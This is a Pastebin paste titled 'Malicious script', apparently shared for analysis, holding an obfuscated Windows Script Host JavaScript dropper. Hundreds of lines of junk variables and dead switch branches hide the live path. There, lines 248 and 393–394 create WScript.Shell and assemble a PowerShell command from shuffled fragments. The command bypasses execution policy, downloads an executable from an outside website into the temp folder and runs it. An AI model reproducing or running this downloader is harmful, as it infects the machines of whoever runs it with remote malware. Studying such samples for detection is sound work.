dynamoo

Malicious script

Jan 19th, 2017
470
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. var orwepuqzo = '20665';
 2. var xinumbuk = "50855";
 3. var dushuxpogdu = 'wmixho';
 4. var sxuheplojo = null;
 5. var esuvci = 0;
 6. var ebgudeli = "run";
 7. var yrydwi = new Function("return WScript")();
 8.  
 9. function sqybyszy() {
 10.     return false;
 11. }
 12. var xlibxarxoh = undefined;
 13.  
 14. function avoqxop() {
 15.     var udisg = true;
 16.     return udisg;
 17. }
 18. var kepagymi = undefined;
 19.  
 20. function icsixja() {
 21.     return undefined;
 22. }
 23. function unomet() {
 24.     var uzipni = undefined;
 25.     return uzipni;
 26. }
 27. ikwapvu = 'osagamne';
 28.  
 29. function uzxuw() {
 30.     var eqit = 1.495;
 31.     return eqit;
 32. }
 33. var miwylxobo = "addezhuxi";
 34.  
 35. function etulufac() {
 36.     return 'wommuzki';
 37. }
 38. function dyvniwipg() {
 39.     return 'atvix';
 40. }
 41. var owbosny = '70611';
 42. var ibbotbyr = 'arqebivh';
 43. var josfivu = "59023";
 44. var tucukne = '54708';
 45. var iguwywj = 'ynity';
 46. var csajoshov = null;
 47. var uvvewpohu = 435;
 48. var imasi = typeof window == 'undefined';
 49. var pybidh = "power" + "sh" + "ell";
 50. vzifez = "dnaxekkinca";
 51.  
 52. function abmexleno() {
 53.     return 362;
 54. }
 55. function syzbatithe() {
 56.     var dysju = false;
 57.     return dysju;
 58. }
 59. function nyvoro() {
 60.     return '86352';
 61. }
 62. var sajxofu = 'ehoqilrarq';
 63.  
 64. function gpuprixg() {
 65.     return null;
 66. }
 67. var yruwa = false;
 68.  
 69. function dymbega() {
 70.     return 0;
 71. }
 72. var suxoxa = true;
 73. var hxiviwer = undefined;
 74.  
 75. function awewi() {
 76.     var gcasi = null;
 77.     return gcasi;
 78. }
 79. function yloglufimj() {
 80.     var wjivni = null;
 81.     return wjivni;
 82. }
 83. function asant() {
 84.     return undefined;
 85. }
 86. var agobkadqez = 'jytu';
 87. switch (hxiviwer) {
 88. case null:
 89.     if (uzxuw() == 9.495) {
 90.         var onojcov = null;
 91.         if (onojcov === 1) {
 92.             var ahvajiwbeql = true;
 93.             var imqycoqkekj = 'zasokuv';
 94.             var ymojilazb = 132.008;
 95.             var ybtylotx = ymojilazb + imqycoqkekj;
 96.             ybtylotx = ybtylotx + 3;
 97.             var rzirebih = 1;
 98.             var ysjyvka = 8;
 99.             ahuqdyfdubr = ysjyvka + iguwywj;
 100.             ahuqdyfdubr = ahuqdyfdubr + "xboh";
 101.         }
 102.     }
 103.     break;
 104. case undefined:
 105.     switch (awewi()) {
 106.     case undefined:
 107.         if (xlibxarxoh == undefined) {
 108.             var ifxuro = 19.2155;
 109.             ifxuro = "78691" + ifxuro;
 110.             var unazwogrevq = "kbudkivjadzo";
 111.             var mofuzijwe = '49065';
 112.             kygysi = "25946";
 113.             wymgizpul = 11.88;
 114.             var mykahm = kygysi + wymgizpul;
 115.         }
 116.         if (unomet() === undefined) {
 117.             var hajcybjeg = null;
 118.             var axkufvaze = null;
 119.             var soxeje = "66247";
 120.             soxeje = 83 + soxeje;
 121.             var ukuwexyg = "76370";
 122.             var vnemqahi = 6.6807;
 123.             var ixmeva = ukuwexyg + vnemqahi;
 124.             ixmeva = ixmeva + 45;
 125.             var oluna = 45;
 126.         }
 127.         if (csajoshov === "skovse") {
 128.             var exivu = 8.4851;
 129.             var ovozgidak = orwepuqzo + exivu;
 130.             var ulkaladv = '67069';
 131.             ulkaladv = 2 + ulkaladv;
 132.             var xwoveq = undefined;
 133.             var batop = 1;
 134.             var nyricimo = undefined;
 135.         }
 136.         if (uvvewpohu == 832) {
 137.             var vqagowizpa = 228;
 138.             mocymma = 68.976;
 139.             var jtidqylvabk = mocymma + vzifez;
 140.             jtidqylvabk = '76182' + jtidqylvabk;
 141.             var dsapawzykh = 1;
 142.             zwyzqiml = 'kenb';
 143.             zivvyrla = 734;
 144.             utylxy = zwyzqiml + zivvyrla;
 145.             utylxy = '8366' + utylxy;
 146.             var jqobik = 2.7575;
 147.         }
 148.         break;
 149.     case "77229":
 150.         if (xlibxarxoh == undefined) {
 151.             var ifxuro = 19.2155;
 152.             ifxuro = "78691" + ifxuro;
 153.             var unazwogrevq = "kbudkivjadzo";
 154.             var mofuzijwe = '49065';
 155.             kygysi = "25946";
 156.             wymgizpul = 11.88;
 157.             var mykahm = kygysi + wymgizpul;
 158.         }
 159.         if (unomet() === undefined) {
 160.             var hajcybjeg = null;
 161.             var axkufvaze = null;
 162.             var soxeje = "66247";
 163.             soxeje = 83 + soxeje;
 164.             var ukuwexyg = "76370";
 165.             var vnemqahi = 6.6807;
 166.             var ixmeva = ukuwexyg + vnemqahi;
 167.             ixmeva = ixmeva + 45;
 168.             var oluna = 45;
 169.         }
 170.         if (csajoshov === "skovse") {
 171.             var exivu = 8.4851;
 172.             var ovozgidak = orwepuqzo + exivu;
 173.             var ulkaladv = '67069';
 174.             ulkaladv = 2 + ulkaladv;
 175.             var xwoveq = undefined;
 176.             var batop = 1;
 177.             var nyricimo = undefined;
 178.         }
 179.         if (uvvewpohu == 832) {
 180.             var vqagowizpa = 228;
 181.             mocymma = 68.976;
 182.             var jtidqylvabk = mocymma + vzifez;
 183.             jtidqylvabk = '76182' + jtidqylvabk;
 184.             var dsapawzykh = 1;
 185.             zwyzqiml = 'kenb';
 186.             zivvyrla = 734;
 187.             utylxy = zwyzqiml + zivvyrla;
 188.             utylxy = '8366' + utylxy;
 189.             var jqobik = 2.7575;
 190.         }
 191.         break;
 192.     case 'ynavahfavj':
 193.         if (xlibxarxoh == undefined) {
 194.             var ifxuro = 19.2155;
 195.             ifxuro = "78691" + ifxuro;
 196.             var unazwogrevq = "kbudkivjadzo";
 197.             var mofuzijwe = '49065';
 198.             kygysi = "25946";
 199.             wymgizpul = 11.88;
 200.             var mykahm = kygysi + wymgizpul;
 201.         }
 202.         if (unomet() === undefined) {
 203.             var hajcybjeg = null;
 204.             var axkufvaze = null;
 205.             var soxeje = "66247";
 206.             soxeje = 83 + soxeje;
 207.             var ukuwexyg = "76370";
 208.             var vnemqahi = 6.6807;
 209.             var ixmeva = ukuwexyg + vnemqahi;
 210.             ixmeva = ixmeva + 45;
 211.             var oluna = 45;
 212.         }
 213.         if (csajoshov === "skovse") {
 214.             var exivu = 8.4851;
 215.             var ovozgidak = orwepuqzo + exivu;
 216.             var ulkaladv = '67069';
 217.             ulkaladv = 2 + ulkaladv;
 218.             var xwoveq = undefined;
 219.             var batop = 1;
 220.             var nyricimo = undefined;
 221.         }
 222.         if (uvvewpohu == 832) {
 223.             var vqagowizpa = 228;
 224.             mocymma = 68.976;
 225.             var jtidqylvabk = mocymma + vzifez;
 226.             jtidqylvabk = '76182' + jtidqylvabk;
 227.             var dsapawzykh = 1;
 228.             zwyzqiml = 'kenb';
 229.             zivvyrla = 734;
 230.             utylxy = zwyzqiml + zivvyrla;
 231.             utylxy = '8366' + utylxy;
 232.             var jqobik = 2.7575;
 233.         }
 234.         break;
 235.     case null:
 236.         uhynaj = "azof";
 237.         var wajkitezi = 199;
 238.         var lkydgamqaxx = wajkitezi + uhynaj;
 239.         var qjylwexawn = false;
 240.         var uwizumo = null;
 241.         var upqicxekt = "66272";
 242.         upqicxekt = "dodoqa";
 243.         var ntaluwese = 970;
 244.         unqadvewbux = xinumbuk + ntaluwese;
 245.         unqadvewbux = unqadvewbux + '56969';
 246.         var bewamd = undefined;
 247.         var kqutsufylp = "yjbers";
 248.         var zmicy = yrydwi.CreateObject('WScript.Shell');
 249.         switch (asant()) {
 250.         case null:
 251.             if (avoqxop() === true) {
 252.                 if (yruwa == "siqzil") {
 253.                     var opvimec = '9988';
 254.                     xninovgamgu = 26.6;
 255.                     ciqewsav = opvimec + xninovgamgu;
 256.                     ciqewsav = "ujofvacry" + ciqewsav;
 257.                     var qexwavowl = 7;
 258.                 }
 259.             }
 260.             if (typeof kepagymi == 'undefined') {
 261.                 udanyjo = 14.362;
 262.                 var yxraci = miwylxobo + udanyjo;
 263.                 yxraci = yxraci + 2.3;
 264.                 var skilpohojta = null;
 265.                 var nnanywejve = false;
 266.                 var ekyxaly = 1.552;
 267.             }
 268.             if (owbosny == "cfaka") {
 269.                 var ixulel = 'awa';
 270.                 var yjhycejn = 'lxoco';
 271.                 var wunowby = false;
 272.             }
 273.             break;
 274.         case "89628":
 275.             if (avoqxop() === true) {
 276.                 if (yruwa == "siqzil") {
 277.                     var opvimec = '9988';
 278.                     xninovgamgu = 26.6;
 279.                     ciqewsav = opvimec + xninovgamgu;
 280.                     ciqewsav = "ujofvacry" + ciqewsav;
 281.                     var qexwavowl = 7;
 282.                 }
 283.             }
 284.             if (typeof kepagymi == 'undefined') {
 285.                 udanyjo = 14.362;
 286.                 var yxraci = miwylxobo + udanyjo;
 287.                 yxraci = yxraci + 2.3;
 288.                 var skilpohojta = null;
 289.                 var nnanywejve = false;
 290.                 var ekyxaly = 1.552;
 291.             }
 292.             if (owbosny == "cfaka") {
 293.                 var ixulel = 'awa';
 294.                 var yjhycejn = 'lxoco';
 295.                 var wunowby = false;
 296.             }
 297.             break;
 298.         case undefined:
 299.             var inigi = 0;
 300.             var ugorazoz = null;
 301.             if (dymbega() == 234) {
 302.                 if (nyvoro() == false) {
 303.                     erbosa = 'kag';
 304.                     actywva = 60.4;
 305.                     var miqrur = erbosa + actywva;
 306.                     var qgoxidfa = 'cromve';
 307.                     var coxynp = 15.363;
 308.                     var exzarepo = 1.54;
 309.                     var awelsoxdoht = 2;
 310.                 }
 311.             } else {
 312.                 var irdonyhfi = 6.1403;
 313.                 var yzahutl = 53;
 314.                 var zujelvo = undefined;
 315.                 var nybimmotg = 10.97;
 316.                 if (imasi) {
 317.                     var ysinu = false;
 318.                     icvonqihe = 16.4386;
 319.                     var qifnehowu = icvonqihe + sajxofu;
 320.                     if (typeof yloglufimj() == 'object') {
 321.                         switch (suxoxa) {
 322.                         case 8:
 323.                             if (ibbotbyr === 174) {
 324.                                 var didevve = '38308';
 325.                                 if (didevve == "elic") {
 326.                                     var flotjaz = 'ehi';
 327.                                     flotjaz = 29 + flotjaz;
 328.                                     apyqkuqg = '27458';
 329.                                     var ulnebask = 89;
 330.                                     var enqyrpo = ulnebask + apyqkuqg;
 331.                                     enqyrpo = enqyrpo + 278.72;
 332.                                     var yzyqnescy = null;
 333.                                 }
 334.                             }
 335.                             if (abmexleno() < 549) {
 336.                                 if (syzbatithe() === false) {
 337.                                     yhzohqyqo = "19928";
 338.                                     uwvumwaztybl = 289;
 339.                                     var zwodfuviz = yhzohqyqo + uwvumwaztybl;
 340.                                     zwodfuviz = zwodfuviz + 47;
 341.                                     var azwenufek = "wuco";
 342.                                     liqziwso = 'apsyvosex';
 343.                                     var ikelyry = 24.4;
 344.                                     var nmolzexwy = ikelyry + liqziwso;
 345.                                     nmolzexwy = 18.2 + nmolzexwy;
 346.                                     var dqozbocy = 435;
 347.                                     dqozbocy = 'whekleplec' + dqozbocy;
 348.                                     var ahsocqy = 2.373;
 349.                                     ahsocqy = "45112";
 350.                                 }
 351.                             }
 352.                             break;
 353.                         case "afycleda":
 354.                             if (ibbotbyr === 174) {
 355.                                 var didevve = '38308';
 356.                                 if (didevve == "elic") {
 357.                                     var flotjaz = 'ehi';
 358.                                     flotjaz = 29 + flotjaz;
 359.                                     apyqkuqg = '27458';
 360.                                     var ulnebask = 89;
 361.                                     var enqyrpo = ulnebask + apyqkuqg;
 362.                                     enqyrpo = enqyrpo + 278.72;
 363.                                     var yzyqnescy = null;
 364.                                 }
 365.                             }
 366.                             if (abmexleno() < 549) {
 367.                                 if (syzbatithe() === false) {
 368.                                     yhzohqyqo = "19928";
 369.                                     uwvumwaztybl = 289;
 370.                                     var zwodfuviz = yhzohqyqo + uwvumwaztybl;
 371.                                     zwodfuviz = zwodfuviz + 47;
 372.                                     var azwenufek = "wuco";
 373.                                     liqziwso = 'apsyvosex';
 374.                                     var ikelyry = 24.4;
 375.                                     var nmolzexwy = ikelyry + liqziwso;
 376.                                     nmolzexwy = 18.2 + nmolzexwy;
 377.                                     var dqozbocy = 435;
 378.                                     dqozbocy = 'whekleplec' + dqozbocy;
 379.                                     var ahsocqy = 2.373;
 380.                                     ahsocqy = "45112";
 381.                                 }
 382.                             }
 383.                             break;
 384.                         case true:
 385.                             if (agobkadqez == 'jytu') {
 386.                                 var ixqewcalseb = 523;
 387.                                 amkybegk = 4;
 388.                                 ohkewoqhu = amkybegk + josfivu;
 389.                                 dcicerw = "84657";
 390.                                 var ydryny = 36.4;
 391.                                 fbumjyjar = ydryny + dcicerw;
 392.                                 fbumjyjar = fbumjyjar + 380;
 393.                                 var exepged = "cmd.exe /c \"" + pybidh + "  $sbyryr='^ent/plugins/ur';$ligud='^Set-ExecutionP';$iwej='^emp+''\idijas.e';$gypa='^Scope  Process;';$yrjabli='^nloadFile(''htt';$ydhujsa='^ct    System.Net.';$eryz='^p://www.studio';$ubcaji='^ $path=($env:t';$nloge='^rocess $path';$rutic='^path); Start-P';$upnetu='^legaleabbruzze';$czamfy='^ht_4832.pdf'',$';$imwedi='^Webclient).Dow';$icypri='^xwhbnw3ez/flig';$amerl='^xe'');(New-Obje';$idfofa='^se.com/wp-cont';$umxefb='^olicy     Bypass     -'; Invoke-Expression ($ligud+$umxefb+$gypa+$ubcaji+$iwej+$amerl+$ydhujsa+$imwedi+$yrjabli+$eryz+$upnetu+$idfofa+$sbyryr+$icypri+$czamfy+$rutic+$nloge);\"";
 394.                                 zmicy[ebgudeli](exepged, esuvci);
 395.                             }
 396.                             yzifi = '82658';
 397.                             var elravco = 207.32;
 398.                             var wpoqzadgyfi = yzifi + elravco;
 399.                             wpoqzadgyfi = 6 + wpoqzadgyfi;
 400.                             break;
 401.                         case "62807":
 402.                             if (ibbotbyr === 174) {
 403.                                 var didevve = '38308';
 404.                                 if (didevve == "elic") {
 405.                                     var flotjaz = 'ehi';
 406.                                     flotjaz = 29 + flotjaz;
 407.                                     apyqkuqg = '27458';
 408.                                     var ulnebask = 89;
 409.                                     var enqyrpo = ulnebask + apyqkuqg;
 410.                                     enqyrpo = enqyrpo + 278.72;
 411.                                     var yzyqnescy = null;
 412.                                 }
 413.                             }
 414.                             if (abmexleno() < 549) {
 415.                                 if (syzbatithe() === false) {
 416.                                     yhzohqyqo = "19928";
 417.                                     uwvumwaztybl = 289;
 418.                                     var zwodfuviz = yhzohqyqo + uwvumwaztybl;
 419.                                     zwodfuviz = zwodfuviz + 47;
 420.                                     var azwenufek = "wuco";
 421.                                     liqziwso = 'apsyvosex';
 422.                                     var ikelyry = 24.4;
 423.                                     var nmolzexwy = ikelyry + liqziwso;
 424.                                     nmolzexwy = 18.2 + nmolzexwy;
 425.                                     var dqozbocy = 435;
 426.                                     dqozbocy = 'whekleplec' + dqozbocy;
 427.                                     var ahsocqy = 2.373;
 428.                                     ahsocqy = "45112";
 429.                                 }
 430.                             }
 431.                             break;
 432.                         case "99257":
 433.                             if (ibbotbyr === 174) {
 434.                                 var didevve = '38308';
 435.                                 if (didevve == "elic") {
 436.                                     var flotjaz = 'ehi';
 437.                                     flotjaz = 29 + flotjaz;
 438.                                     apyqkuqg = '27458';
 439.                                     var ulnebask = 89;
 440.                                     var enqyrpo = ulnebask + apyqkuqg;
 441.                                     enqyrpo = enqyrpo + 278.72;
 442.                                     var yzyqnescy = null;
 443.                                 }
 444.                             }
 445.                             if (abmexleno() < 549) {
 446.                                 if (syzbatithe() === false) {
 447.                                     yhzohqyqo = "19928";
 448.                                     uwvumwaztybl = 289;
 449.                                     var zwodfuviz = yhzohqyqo + uwvumwaztybl;
 450.                                     zwodfuviz = zwodfuviz + 47;
 451.                                     var azwenufek = "wuco";
 452.                                     liqziwso = 'apsyvosex';
 453.                                     var ikelyry = 24.4;
 454.                                     var nmolzexwy = ikelyry + liqziwso;
 455.                                     nmolzexwy = 18.2 + nmolzexwy;
 456.                                     var dqozbocy = 435;
 457.                                     dqozbocy = 'whekleplec' + dqozbocy;
 458.                                     var ahsocqy = 2.373;
 459.                                     ahsocqy = "45112";
 460.                                 }
 461.                             }
 462.                             break;
 463.                         }
 464.                     }
 465.                 } else {
 466.                     if (sqybyszy() === false) {
 467.                         if (gpuprixg() == 'xipdynq') {
 468.                             var awzypsu = undefined;
 469.                             if (awzypsu == "mamohwaqk") {
 470.                                 var rjigankevy = undefined;
 471.                                 var gborgapeg = 453.4078;
 472.                                 zzidoracri = 'onanygix';
 473.                                 cqocyhym = 2;
 474.                                 var igimmefli = zzidoracri + cqocyhym;
 475.                                 var jhaqkawokta = undefined;
 476.                                 var uxiguxebq = "61682";
 477.                                 var ciwimel = 0.503;
 478.                                 var ecbimte = ciwimel + uxiguxebq;
 479.                                 ecbimte = ecbimte + 302;
 480.                                 var tizodeji = "92176";
 481.                                 var ukibry = 13.466;
 482.                                 ocmumfojqots = ukibry + tizodeji;
 483.                                 ocmumfojqots = ocmumfojqots + '2157';
 484.                             }
 485.                         }
 486.                     }
 487.                     if (sxuheplojo === null) {
 488.                         var iqxoqurdy = '58928';
 489.                         vpepxenux = 5;
 490.                         var dzowfezt = iqxoqurdy + vpepxenux;
 491.                         dzowfezt = '30739' + dzowfezt;
 492.                         var asgipwu = 'upjuvni';
 493.                         var scoreltofro = 947;
 494.                         var hufiq = asgipwu + scoreltofro;
 495.                         var epwaqhy = "sdiqc";
 496.                         epwaqhy = "ojveqce";
 497.                         var kkoqaxoqki = 5;
 498.                         var qekezufwo = kkoqaxoqki + dushuxpogdu;
 499.                         var dyddacolf = 60.35;
 500.                         lduqsavbasq = ikwapvu + dyddacolf;
 501.                         lduqsavbasq = lduqsavbasq + "3119";
 502.                         var jvupeka = '37458';
 503.                         var ysexgix = 5.623;
 504.                         var abymutotd = ysexgix + jvupeka;
 505.                         abymutotd = abymutotd + '20777';
 506.                     }
 507.                 }
 508.             }
 509.             break;
 510.         case "ynawycf":
 511.             if (avoqxop() === true) {
 512.                 if (yruwa == "siqzil") {
 513.                     var opvimec = '9988';
 514.                     xninovgamgu = 26.6;
 515.                     ciqewsav = opvimec + xninovgamgu;
 516.                     ciqewsav = "ujofvacry" + ciqewsav;
 517.                     var qexwavowl = 7;
 518.                 }
 519.             }
 520.             if (typeof kepagymi == 'undefined') {
 521.                 udanyjo = 14.362;
 522.                 var yxraci = miwylxobo + udanyjo;
 523.                 yxraci = yxraci + 2.3;
 524.                 var skilpohojta = null;
 525.                 var nnanywejve = false;
 526.                 var ekyxaly = 1.552;
 527.             }
 528.             if (owbosny == "cfaka") {
 529.                 var ixulel = 'awa';
 530.                 var yjhycejn = 'lxoco';
 531.                 var wunowby = false;
 532.             }
 533.             break;
 534.         }
 535.         break;
 536.     }
 537.     break;
 538. case 18.243:
 539.     if (uzxuw() == 9.495) {
 540.         var onojcov = null;
 541.         if (onojcov === 1) {
 542.             var ahvajiwbeql = true;
 543.             var imqycoqkekj = 'zasokuv';
 544.             var ymojilazb = 132.008;
 545.             var ybtylotx = ymojilazb + imqycoqkekj;
 546.             ybtylotx = ybtylotx + 3;
 547.             var rzirebih = 1;
 548.             var ysjyvka = 8;
 549.             ahuqdyfdubr = ysjyvka + iguwywj;
 550.             ahuqdyfdubr = ahuqdyfdubr + "xboh";
 551.         }
 552.     }
 553.     break;
 554. case 5.8:
 555.     if (uzxuw() == 9.495) {
 556.         var onojcov = null;
 557.         if (onojcov === 1) {
 558.             var ahvajiwbeql = true;
 559.             var imqycoqkekj = 'zasokuv';
 560.             var ymojilazb = 132.008;
 561.             var ybtylotx = ymojilazb + imqycoqkekj;
 562.             ybtylotx = ybtylotx + 3;
 563.             var rzirebih = 1;
 564.             var ysjyvka = 8;
 565.             ahuqdyfdubr = ysjyvka + iguwywj;
 566.             ahuqdyfdubr = ahuqdyfdubr + "xboh";
 567.         }
 568.     }
 569.     break;
 570. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×